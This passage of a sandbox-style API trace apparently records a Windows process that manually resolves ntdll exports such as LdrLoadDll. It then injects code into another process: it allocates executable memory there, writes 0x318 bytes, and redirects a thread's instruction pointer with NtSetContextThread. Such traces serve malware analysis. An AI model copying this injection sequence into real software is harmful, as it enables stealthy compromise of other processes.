lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0208.683] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0208.683] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=1227984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12bcd0 [0208.683] ReadFile (in: hFile=0x1ac, lpBuffer=0xb0938cf2a0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0xb0938cf2d8, lpOverlapped=0x0 | out: lpBuffer=0xb0938cf2a0*, lpNumberOfBytesRead=0xb0938cf2d8*=0x4, lpOverlapped=0x0) returned 1 [0208.684] CloseHandle (hObject=0x1ac) returned 1 [0208.684] GetModuleFileNameA (in: hModule=0x7ff977f30000, lpFilename=0xb095a03f40, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0208.684] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrGetProcedureAddress") returned -1 [0208.684] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrGetProcedureAddress") returned -1 [0208.684] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrGetProcedureAddress") returned -1 [0208.684] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgPrint", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0208.685] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0208.686] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrGetProcedureAddress") returned -1 [0208.687] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0208.687] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=1227956, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12bcb4 [0208.687] ReadFile (in: hFile=0x1ac, lpBuffer=0xb0938cf2a0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0xb0938cf2d8, lpOverlapped=0x0 | out: lpBuffer=0xb0938cf2a0*, lpNumberOfBytesRead=0xb0938cf2d8*=0x4, lpOverlapped=0x0) returned 1 [0208.687] CloseHandle (hObject=0x1ac) returned 1 [0208.688] GetModuleFileNameA (in: hModule=0x7ff977f30000, lpFilename=0xb095a03f40, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0208.688] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0208.688] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=1234820, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12d784 [0208.688] ReadFile (in: hFile=0x1ac, lpBuffer=0xb0938cf2a0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0xb0938cf2d8, lpOverlapped=0x0 | out: lpBuffer=0xb0938cf2a0*, lpNumberOfBytesRead=0xb0938cf2d8*=0x4, lpOverlapped=0x0) returned 1 [0208.689] CloseHandle (hObject=0x1ac) returned 1 [0208.689] NtAllocateVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0xb0938ced80*=0x0, ZeroBits=0x0, RegionSize=0xb0938ced88*=0x318, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xb0938ced80*=0x4760000, RegionSize=0xb0938ced88*=0x1000) returned 0x0 [0208.690] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xb0938cedd0 | out: Context=0xb0938cedd0*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100003, MxCsr=0x0, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x247, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0xfff2efe73f4, Rcx=0x0, Rdx=0x10004000000000, Rbx=0x7ff977f39fa0, Rsp=0x235f898, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x7ff977f39fa0, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 0x0 [0208.690] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.690] NtWriteVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x4760000, Buffer=0xb095a03f40*, NumberOfBytesToWrite=0x318, NumberOfBytesWritten=0xb0938cf2c0 | out: Buffer=0xb095a03f40*, NumberOfBytesWritten=0xb0938cf2c0*=0x318) returned 0x0 [0208.690] NtSetContextThread (ThreadHandle=0x1a4, Context=0xb0938cedd0*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100003, MxCsr=0x0, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x247, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0x4760000, Rcx=0x0, Rdx=0x10004000000000, Rbx=0x7ff977f39fa0, Rsp=0x235f898, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x4760218, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, 